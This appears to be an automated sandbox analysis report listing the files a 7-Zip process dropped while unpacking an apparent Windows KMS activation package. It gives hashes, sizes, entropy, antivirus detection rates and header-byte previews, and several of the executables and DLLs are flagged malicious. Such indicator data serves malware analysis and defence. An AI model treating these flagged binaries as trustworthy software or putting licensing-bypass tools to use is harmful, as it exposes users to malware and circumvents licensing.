Preview:7z..'....L...)......$............eC..].&..p.........../D.|.../._..z.-~A..\..*~kHy54......<.....=......6......! o..- 6Y..x..iC.#.@.LN....U...........%...[@...../.4.$...._......F;s%.P.|F.C..y@.."...H..jau..C....i..o.<D..[r.9y9.W..4......k..oNG..?X...q.r....g.QaZ...6..=%... ..).z..[.......fUx...mY-0.U.;6.....4..K.N...a...6...L...........[]v..e.i....r.T;.....c.R0..D.X_...a.:......2.r.E.!.....c.....!....U........4.............aIn...(.c.Z.6....:s...*...o...s.^).....D...#..%.].<C....G.<3.;.W.2..je.k.....]b.Q.|.C.B.qw.I.......=..|U..s......PH..u.{...FM..X..8....T/.E[...p..g.9......;.4.k.U..........Y5.^.0E..0'..yr..20{N.)...9E...._...:{..PL..).a.......B.|....b.i}9L..c..*..Fh.....>. ..$k.).a..e.}......../.....H5.$\r...O.y.[...}....P.!A.T}.l.A..>m.:....)Z*..2.3(..3.....l.p..%L7K......L.i[...4O.....{$..A.^.'.....BP....#.D...'.C.\..xx}..>O..T..9..2......{.........J.2..(..~J..X..W............0...kkR.-.t3q.h.4.d.....4..zY...l~l...N....B........K..j..0.I.O

C:\Windows\_temp07242019502489\kms-client.exe

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):50176
Entropy (8bit):6.986513386510911
Encrypted:false
SSDEEP:768:ni4+3t40RYpj0yuv52OFF/n16CRqXwW214U/ZJuEnotvrprIWtYDsJSUhX:ElYAvLFF/n1FcSPZYFvrprIW2sJSu
MD5:87821AB4AACB291B97212B4F39F2579D
SHA1:1F2FDCC271BFA7A104A999D01942FB1E3C42DA34
SHA-256:034F12590C9FC94021FCF9A1DD22BE3C38C2AF34BA7DCDB9B8F2C6B628E3AF95
SHA-512:E7B8FBD99C6E24C7912053BBFFF1AEE8E10A6196A5D75ADECD259814500EE5C841E963CE04D0515FCC0720017764052A681D0587F81BA95A092E60E424A5DF31
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 33%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......".l.fo..fo..fo..x=..do..fo..Ho......mo....co....go....go..Richfo..................PE..L....2jQ.........."......"...........&.......@....@.......................................@.............................................`.......................p....@..8............................................@...............................text.... .......".................. ..`.rdata.......@.......&..............@..@.data...A...........................@....rsrc...`...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\_temp07242019502489\kms-server.exe

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):38912
Entropy (8bit):6.678077840928496
Encrypted:false
SSDEEP:768:Rum0N2cc22MX2CFa/bCHhebFVcbDvI2xPwPqkjdn3BAmqlyc:Rx0QcxnNa/bIhc+LvWjd3ym
MD5:B87FC65EEFF6A9AD80F95BF6825B53CE
SHA1:2F024C0250EDF670E26C110C3E6907B48F1659EA
SHA-256:9F8A7B4CA21FF277D07291590CB6BD05983CD00CA232E15383394EF95FE72D7E
SHA-512:6706CCCBE195FCEE870E28CD28268D3334850E2FCB1D7445DD9C8738E2BF670B183E9BA638A61771E90B642538D4C331C7191EB6906D3988002FBF2027679739
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 49%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......kR../3m./3m./3m.&K..*3m./3l.^3m.&K.. 3m.....!3m......3m.Rich/3m.................PE..L......[.........."......X...B......Z[.......p....@.......................................@....................................................................,....................................................p...............................text...0V.......X.................. ..`.rdata..F)...p...*...\..............@..@.data...............................@....reloc..,...........................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\_temp07242019502489\kms.exe

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):974336
Entropy (8bit):6.906832511172037
Encrypted:false
SSDEEP:12288:wCdOy3vVrKxR5CXbNjAOxK/j2n+4YG/6c1mFFja3mXgcjfRlgsfBgayQPM2qmG90:wCdxte/80jYLT3U1jfs3ayQPHGrHlQ
MD5:8AE655A25B75EFC289CC29E1A25D0B10
SHA1:BBC8D50E62915FEB25405C2292DED95996CBD5D4
SHA-256:78AAF80445A9323FB0EFADDFA5A411941C0A2C1A8BACEE10185F3CE82D0C731C
SHA-512:9B7428B03D00C593317541D11DBCC03F3B769195E30E1A9E00EFD18451511D0E03CC32EFB0039456B536FBCDDCB8393DBD003C891D59531337F06E034DA7EB47
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 56%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L....pY]..........".................J.............@..........................P......1I....@...@.......@.....................L...|....p..@U......................0q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...@U...p...V..................@..@.reloc..0q.......r...l..............@..B........................................................................................................................................................................................................................................................................................

C:\Windows\_temp07242019502489\kms_x64.exe

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1092608
Entropy (8bit):6.6790762126241665
Encrypted:false
SSDEEP:24576:DfTkD0E003ubc2MRgCmP/ZwIDzq+Iha9a0HMQuBGrH:zG00SSgCmP/ZwYj44a0sQu0r
MD5:99DF73A907996E98E96917FAE743B506
SHA1:A2399225048B685C15E34A1880BDB619D352D0DC
SHA-256:DEA555536F4AE87A381111E07F9058E4111170AE273863774A52ADA531114A65
SHA-512:CBE1F85EEC790E0979EA115EAC5716DF1F9A86B078B72A8C2637BA49DBB95787937F177E976ED877316915327346B409E71F91D970DF82D5E8D3D26F53B8EB4B
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 4%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v.bi2..:2..:2..:.b.:3..:t..:...:t..:+..:t..:...:;..::..:;..:3..:;..:...:2..:...:.\.:b..:.\.:3..:?..:3..:2.:3..:.\.:3..:Rich2..:................PE..d... pY].........."..........&.................@.............................@............`...@...............@..............................e..|.......@U...`...i...........0..........................................p............... ............................text............................... ..`.rdata..............................@..@.data...0........^..................@....pdata...i...`...j..................@..@.rsrc...@U.......V...J..............@..@.reloc.......0......................@..B................................................................................................................................................................................................................................

C:\Windows\_temp07242019502489\pic\Windows.jpg

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=59, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=59], baseline, precision 8, 59x59, components 3
Category:dropped
Size (bytes):15909
Entropy (8bit):6.635110274937036
Encrypted:false
SSDEEP:192:c8ZesNAd28y4vay9x8ZesNAetgkn8577iUYNMtKw0cJKRjGj95aXCXFHY9:9uoPURGuQbn897iUYNg70/Rj+97HY9
MD5:DFC65F2CF9A20AF7E6BC1D1A313E1832
SHA1:B2AA96DE85E9DB278A95C460CC39423FC809A322
SHA-256:7AA09C46EB983C490304319D6CC455A17F77631C13F7053B3D2DCF1B95F0EF89
SHA-512:DE1F6C0C38BFD9410862403C8D3D35B9D4F373239BA3A1B9BD00481CA2A5EE2F560D78A15357EB0CED5197629146ABE7557B42838B88B5DA7D1007A5100174B4
Malicious:false
Preview:......Exif..MM.*...............;...........;...........................................................................(...........1...........2..........i............. .........x..'....x..'.Adobe Photoshop CS6 (Windows).2019:08:15 02:54:33.............0221.......................;...........;...............................n...........v.(.....................~.........../.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................;.;.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...s1).z.........[...U...../...a...[..V?..#....i|['....2...{[~.t.}.m..h.......

C:\Windows\_temp07242019502489\pic\amt.ico

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:MS Windows icon resource - 8 icons, 48x48, 8 bits/pixel, 32x32, 8 bits/pixel
Category:dropped
Size (bytes):26694
Entropy (8bit):4.143707547504497
Encrypted:false
SSDEEP:384:42PbHmDp+TDNc8e8n9Y4bNpuNEd/wIIV0aWxHCH:4oSpCDxeS9Y4nuGd66pCH
MD5:DBA1C0CE8EC65699B8C955A243E68BE2
SHA1:2E7A0707D98B7BDAA42E51FE8B811E64508E26D8
SHA-256:1041B38106701F2E556D0939E1070725EB490FE83F1A5ED0956C0894639DF945
SHA-512:A85915E6B3E336D1B6A325C0863243C3BA4650B0CF54FC2ABB99CDD58611D2BBE2E93E660CF1FC43B3627F702E295A5422D20D6FF65C8EF3AAD2061C7A735749
Malicious:false
Preview:......00.............. ......................................h.......00.... ..%...$.. .... ......I........ .....VZ........ .h....c..(...0...`....................................\...W...[...[...]...k...`...e...i...`...j...u...{...n...s...v...v...y...|...z...}...q...{...~......._&.._).._"..a$..a(..c-..f ..d'..k"..a)..h-..m/..p&..q,..d2..g7..h;..h5..m1..g8..h9..m;..j<..q4..v;..v$..x%..z"..v*..z+..|*..v2..y4..~0..z<..l@..oF..qF..u@..sJ..wI..yJ..uQ..}R..yV..|Y..|C..~K...U...a...................................................#... ...+...,...9........................................................................ ..<..%..$..*..=..8..6..?..!............... ... ...!..."...#...$...$...%...D...E...M...M...C...T...[...e...g...b...c...b...l...l...k...m...r...s...u...s...|...|..N..D..\..T..d..g..q..L...E...I...S..$I...O..7W..1T.. I..!\..4T...h...v...{...z..4d..=g..7o..9k..<s..#w..(p..*{..4u..0y..3u..9r..3~..^n..at..mx..E\..Bb..Jb..Gk..Tf..Rl..Bp..[t..Zx..Ea

C:\Windows\_temp07242019502489\pic\backup.bmp

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PC bitmap, Windows 3.x format, 46 x 46 x 24, image size 6442, resolution 3779 x 3779 px/m, cbSize 6496, bits offset 54
Category:dropped
Size (bytes):6496
Entropy (8bit):4.6593183689453745
Encrypted:false
SSDEEP:96:POqX7999EYqJFiEv4Y/9y/kDUwpaUvQh54ZbLsDpkU7pE840OlpS:PHuniKvisU7mbLsDpkU7pE848
MD5:81468764F0D9EB0466FD6D60E478848C
SHA1:BCD61CFD3AC185A55C1E911525452FF2E1ABB277
SHA-256:A786CB47A0561CFE54C56F21A3BD77669A755DD236A99E5660C245C2063FF92D
SHA-512:5B88936D7BB69518687A3519223CB54B2DFB01BC49B889DC1C2FDE0CA73DCDF147964C7362E8086B8BAB87BA51495223F1BAA6A2EBCC4F05EA0C24520E1B6529
Malicious:false
Preview:BM`.......6...(...................*............................................................................................................................................................. .......................................................................................................................................... .......................................................................................................................................... ................................................................................................................... ................................................y..z..y..y..y..y..z..y..x..y..u.......................................................... .............................................................................................................................. ...............................................................................................

C:\Windows\_temp07242019502489\pic\ewm_wx.jpg

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=91, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=217], baseline, precision 8, 91x91, components 3
Category:dropped
Size (bytes):33454
Entropy (8bit):7.472311194218384
Encrypted:false
SSDEEP:384:pABxCGILTfZPYoABxCGILTfC9snrDTLpCiWfYNg70bEG7Z1KG8ZUAVvvBByU9BL1:pABI5PNABIi9soYy27Z4GzAV3t
MD5:362E94B6AD5AC32CED1E9C84B7409506
SHA1:094584059B3E3462DA4298B651A92D1FD0691325
SHA-256:1F81E6D61080ADBBACB425C21BC9FC8EB33269DA462CBF00FBF6BE3BDB14C308
SHA-512:672A21FFBDC578E820E307ACEF68BD1CB0A252ADC3E2DD6F097FB6320BB313F89711E71C232589B78BB856323E062424A73EDFD5720A68E4D7B67C044CC7FDAB
Malicious:false
Preview:......Exif..MM.*...........................[...........................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2019:08:13 21:57:20.............0221.......................[...........[...............................n...........v.(.....................~...........*.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................[.[.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..........W....3,1.........;.St...}f.qzg...fK*}.........J1h.U}q.....+5.....!.s

C:\Windows\_temp07242019502489\pic\ewm_zfb.jpg

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=91, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=217], baseline, precision 8, 91x91, components 3
Category:dropped
Size (bytes):34696
Entropy (8bit):7.482507208526178
Encrypted:false
SSDEEP:384:FDwDFEsEITYGjcNA6PYfcwDFEsEITYGjcNAh9snuDTLpCiQfYNg70brtJBSWS1mV:aDFEGx6PG1DFEGxh9sZYyatJwPuDYU
MD5:D3A12977FFFC2002685151F0AF5143EA
SHA1:AC3C887BEE44748FA9192AAA32606EA768B9E459
SHA-256:F046F91EAC3DBE86D9E2DCC11281CA855A96F15A8F8ED62F0216F3076826FA35
SHA-512:4247AEE80B6F55466D4BA2FC6B3D9BA76575CBDBC74B96CB810768D396C1E7469CBCC2D81CD4F7C79A39BF1A69AD3FD14A97E97156D6FF2EF43E4C56BE5885D0
Malicious:false
Preview:.....LExif..MM.*...........................[...........................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2019:08:13 22:19:46.............0221.......................[...........[...............................n...........v.(.....................~...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................[.[.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...:.S.......'...>..{......f.v..`.Q.r.......~M.+...`..&..j.....~..t.....6.1..

C:\Windows\_temp07242019502489\pic\head.jpg

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS5.1 Windows, datetime=2019:03:29 19:59:23], baseline, precision 8, 180x19, components 3
Category:dropped
Size (bytes):28689
Entropy (8bit):7.2502565225542694
Encrypted:false
SSDEEP:384:6aYNg7ZJEisYNg7ZJFnqR3lYNg70TX0QS8WnS+O3EYiffPizJkOg:6aYyfEXYyfFsYyZQS3STEXfHizJkOg
MD5:069D803D68FA5BB3BADE568A8F6BC1CE
SHA1:DBB7B41831D705B762A2B87A6F8E7CB4EE6FC9E5
SHA-256:9C047B20F9BAA9FDEADD70D93CCE5FC5F31D1C4F446CB2D9ACC523209E6C75E3
SHA-512:ABEB1E94BC63FDC5496B354B8788CDB249E92B0FE0829F8A0052F5B8D4F09309B62DBC85F2FE1370C527F97F9E45AC0AABDE44BEDF9175792DB90131432BE885
Malicious:false
Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS5.1 Windows.2019:03:29 19:59:23..................................................................................&.(.........................................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....

C:\Windows\_temp07242019502489\pic\left.jpg

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=36, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=80], baseline, precision 8, 76x34, components 3
Category:dropped
Size (bytes):17774
Entropy (8bit):6.857847680490455
Encrypted:false
SSDEEP:384:SL8JSc9yWPiuL8JSc9EvnypCSClikYNg703Vieip+4/CC:Xb9yWPSb9EvypPkYyMVEz
MD5:EA96D8162A586640D7AC631F52B83372
SHA1:36984EC6B439CD61210B80BA29C46348310AECDD
SHA-256:5E74AC75BF1609AA8E05316D19121E24B095B6796DD330D6FA7A6C084DB2C03B
SHA-512:F561B801AEC17D899C260DCB06D46B8664F82E9BE6CB6791C567FFD76C175A1EB2668A9F4806B403DB8C9ECA343C906562771B88A45D67FC2B197BB5F0CC2CEB
Malicious:false
Preview:.....|Exif..MM.*...............P...........$...........................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2019:08:15 02:44:16.............0221.......................L..........."...............................n...........v.(.....................~...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................".L.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....?..{...C..}E*...~.fUt........Q.....=.3...K....U.,.....[..k..64....K..=.V.

C:\Windows\_temp07242019502489\pic\office.jpg

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2019:08:13 22:26:06], baseline, precision 8, 59x59, components 3
Category:dropped
Size (bytes):16885
Entropy (8bit):6.864092276009675
Encrypted:false
SSDEEP:384:jj1GgLPYR1GgunvnXbi5YNg70/B7EP0EwE4CMl:jj1G4PS1GtnvwYyWEhPE
MD5:A1C4BF7146746082146397E5197682A0
SHA1:C26C7D9466B7CAF5859DC721192E0562ACEF565A
SHA-256:D97A73D83088B4DE0B333307893B1C66924BC5276A5413DC1C9C2C4B09B5F97A
SHA-512:7534D1B48B15590DD273B11FD869230752259D0C7C1926C8D08E179FEFA4C4AA54BB0D623E44856650496EDE4BAE2D3E8FA864D604CBC3EC9379A35147CEC5D2
Malicious:false
Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS6 (Windows).2019:08:13 22:26:06..........................;...........;...........................................&.(.........................................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................;.;.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..U.n........@...3...l...b.....g..i..o$..?...w.@<}.1...!.....]::.........e.Dy........1d2.............~...p.f;{9....X.....Y..*.xIy........1.....`..Yi.......

C:\Windows\_temp07242019502489\pic\restore.bmp

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PC bitmap, Windows 3.x format, 46 x 46 x 24, image size 6442, resolution 3779 x 3779 px/m, cbSize 6496, bits offset 54
Category:dropped
Size (bytes):6496
Entropy (8bit):4.626099001444027
Encrypted:false
SSDEEP:96:POqX7999EYqJFiEv4s/Jy/kDDwboUZhVrY+16by8KnKfh/Lz3OlpD:PHuniK/isD7MYW6by8KnKJ/Lzg
MD5:DF9507E7162CAE71289767F393B75507
SHA1:0934DF7CC1DD458CF1180D19007E9A36973F1BD0
SHA-256:59D0339D7BD251BC7A22457C9A9673B700B5639EA6E9F4330AD3240C7191D7F0
SHA-512:512342CB1D8E25A8FF1C12099A8E7EC0B1E31FF3D5B1F80C717F30B258785FAA8FA306E47AB9B8FE62E4506F51C4C8D979ECE0E85A971FEFA6C12DC4B46F6EA6
Malicious:false
Preview:BM`.......6...(...................*............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................y..z..y..y..y..y..z..y..x..y..u...........................................................................................................................................................................................................................................................................................

C:\Windows\_temp07242019502489\pic\shuoming.jpg

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=91, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=217], baseline, precision 8, 360x140, components 3
Category:dropped
Size (bytes):76526
Entropy (8bit):7.734924468356919
Encrypted:false
SSDEEP:1536:Q6pxTuc6pxTuaZeAfRE76Kv/PwQNwNn8C:QAKcAK2e0Ehv/PHw9x
MD5:5076A9A63ABEE8F983A3B340EF94493C
SHA1:0C1C672E7FBC7047052F3995E91813373215A8FB
SHA-256:B41530F2A85CE734F0AE97A60CCA72AABF330D8F06113DDA9852E4AF586AE1ED
SHA-512:3338059C180A9A94CAE34FDEAFA6EBAA430288172501FCD25994868A2F074DD748BCB2087C7E6120E00FE2E75E48E69AF05E22AF85284C5E3211040E88F2FCC7
Malicious:false
Preview:....'.Exif..MM.*...........................[...........................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS5.1 Windows.2019:07:28 00:18:16.............0221.......................h...........................................n...........v.(.....................~..........&P.......H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......

C:\Windows\_temp07242019502489\pic\ver.ico

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:MS Windows icon resource - 7 icons, 16x16, 16 colors, 4 bits/pixel, 48x48, 8 bits/pixel
Category:dropped
Size (bytes):22798
Entropy (8bit):4.242608019081887
Encrypted:false
SSDEEP:192:K6DuuuuuuD8o8o9o19d8opquXy1TyeL5555555SbdYelRI9IRc9lRt:nPm65555555SbdT70MY7
MD5:3B456048C963F39B7B918C34742DFF8D
SHA1:8DD5BD2F1DC5F896D3CB14CDEC7691C42A60EC9A
SHA-256:D352BBE8C271CC9007A841A5B7DB960262FC85CAE580F9814EB0B5C7E7E0B7E8
SHA-512:ABC38E1DE5D9C982975965B784B692F6E8220BCB6E19CF0E66105A3207477F7CC03710E4563AA86666CFC4C411B0EA110C9E9EFE827D26EA76A5E82010629A96
Malicious:false
Preview:..............(...v...00.............. ..........F...........h.......00.... ..%..V... .... ......C........ .h....T..(....... ...............................................................................................................nnn............;................nn.o.;.......................333...........{;7.....:z:.....{77...........s.s................................................................(...0...`.....................................n...p...............::..EF..xx..Q..Q..].............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\_temp07242019502489\pic\zanzhu.ico

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:MS Windows icon resource - 9 icons, 48x48, 16 colors, 4 bits/pixel, 32x32, 16 colors, 4 bits/pixel
Category:dropped
Size (bytes):25214
Entropy (8bit):5.715974967201889
Encrypted:false
SSDEEP:384:8kwAAjAAj0kwdWSTAAjAA8q2Mps3Di0fVvSqzj2K3B38AhAytrq9h+Aemrs:8kC0BdWSMqBa3DigF19vq9ds
MD5:94306384EFDADFDCEA096A022738BF1E
SHA1:72385C23173686AC2500BA3BCA094C0C94E76212
SHA-256:9672B50641BA9F9F1735FEE2D3BA4FDC5BDA18545530EE1869E01C25618C1345
SHA-512:38F7DE2AB148DAEA9F879665459FE374B1032B10EB1BE6769FA17FFC8FC9B12A4BF8B9822A3BCA2C8704AEC7A996D5FE058E2A759A21F351162A8FCCA729BBDF
Malicious:false
Preview:......00......h....... ......................(.......00.............. ......................h...^"..00.... ..%...'.. .... .....nM........ .h....^..(...0...`.........................................................................................................................................................v|....................l........................|..w.................||..................|l~....~................|l.|.w.................|......x..................................l|...................l|.g..|...~..........|l.v.......w.........l|v..|~......~~.v.........|.l........|...............g....|...~......||n...~....|.........|.l|.|l~.............ll|g..|||...|...w...........|l.....n.|.......v......|.....~~.~g.........l.....~..........|||f.......~.nw.......lv~.....~....~..X~............||l...~.......|...||.|l.g...|.~.h...h...v~.|.g..........|.|...........||......v..~g....||.~|...n...|.|.|..|.....|n....w.....|...g..|....~W..||.....n...|~.|~p..|

C:\Windows\_temp07242019502489\x64\SECOPatcher.dll

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):6656
Entropy (8bit):4.2431777583260875
Encrypted:false
SSDEEP:96:G9lk4Roy4A+WJAHOSmTsz7TRHWfUwtdkS6hJTZNZ6tkG:G9aHy4A+WJEOSmAPT6VdkS6hJTZr6t
MD5:5C5DC1D8085A9DF4CC44F5F39630297D
SHA1:5F82A6B89BCCAF37849B943C99B49FAC204F7450
SHA-256:A6B7BCC8E941A7AAFB8C077DC4B17344A965E7E0DA0F012D24F27B982434850E
SHA-512:9E9029DED4CFDA70A229B88CA0088B53703DFA8AC8BC88DA8A8A8C8E8080F87E610D4F42900A8D7619BF87CB95C887557DBE3054FD6663A24F07F00F074D9BA1
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 46%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................&'i.....................................Rich...................PE..d...^.y[.........." ................D........................................P............`.........................................0%..d....%..<...........(!..l............@......."..T............................................ ..(............................text............................... ..`.rdata..r.... ......................@..@.data...@....0......................@....reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\_temp07242019502489\x64\SetACL.exe

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):559528
Entropy (8bit):6.0903310211485335
Encrypted:false
SSDEEP:12288:ZM9AwIce16TCkcgxjouFmQGzt/B6QziZUt2qaV7se:ZM9Sce16TCkcgxMuFmQGztZZiSAqA7R
MD5:3E350EB5DF15C06DEC400A39DD1C6F29
SHA1:F1434CFEF2C05FDA919922B721EC1A17ADB3194E
SHA-256:427FF43693CB3CA2812C4754F607F107A6B2D3F5A8B313ADDEE57D89982DF419
SHA-512:B6B6CDFE2B08AA49254E48302385A3A2A8385E2228BDCFFD3032757ACF1A1D4ABFF1270F5488083CFA4480439FF161A9D0EA5F193CABC1EB1E7B1255CE262AB6
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..0..c..c..c...c..cs.>c..c.o.c..c.o>c'.c.o?c..c...c..c..c..c.o:c..c.o.c..c...c..c.o.c..cRich..c........................PE..d...QLNP..........".................8..........@.....................................'....@.................................................t...........`....`..|>...r...............................................................................................text............................... ..`.rdata..............................@..@.data....T.......,..................@....pdata..|>...`...@..................@..@.rsrc...`............L..............@..@.reloc..0............`..............@..B........................................................................................................................................................................................................................................

C:\Windows\_temp07242019502489\x64\SppExtComObjHook.dll

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32+ executable (DLL) (native) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):18432
Entropy (8bit):5.6059836483155925
Encrypted:false
SSDEEP:384:QKSNkidSydP2bVSxvdor3nu0+BrRrbOj2tKABxfvL33k:b8mW+nu04r6StKABm
MD5:95F143EC661A5DA85C3C8199D9FE06E7
SHA1:94EE8C5856DC0570A8F12CD08ECB0560F3A61908
SHA-256:F239C27B50CEF792FEA5B34378FBAC83BCC06B8442D508BD9ADD7DDF8CA5C632
SHA-512:0FE0304F4FD4810A6AAB5F35410B195C44302332C721EBFDB1C87E3081EC98A9EA9EC796BB135883DDF2906D82DB51D29E34017C989F4F8AD4E17BBB1B00781E
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....W.\...........".....*..........P..........i..........................................@... ..............................................`..E............................p.......................................................`...............................text....(.......*.................. .P`.data........@......................@.`..idata..E....`.......@..............@.0..reloc.......p.......F..............@.0B................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\_temp07242019502489\x64\cleanospp.exe

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):19968
Entropy (8bit):5.085145072450436
Encrypted:false
SSDEEP:384:gQAInWKpEFFzpjq37oIOU6GHq33QPiu431VP:gxWTpOFagUb2qiu43P
MD5:162AB955CB2F002A73C1530AA796477F
SHA1:D30A0E4E5911D3CA705617D17225372731C770E2
SHA-256:5CE462E5F34065FC878362BA58617FAB28C22D631B9D836DDDCF43FB1AD4DE6E
SHA-512:E0288DCF78092449D9CBAEF4488041131925387C1AEDC9E9512DA0F66EFE2FB68350CA3937F6715834E62E7C931C5DAD0FC8BC3C6C0C3DAEDEFF356D6FEAAC2E
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
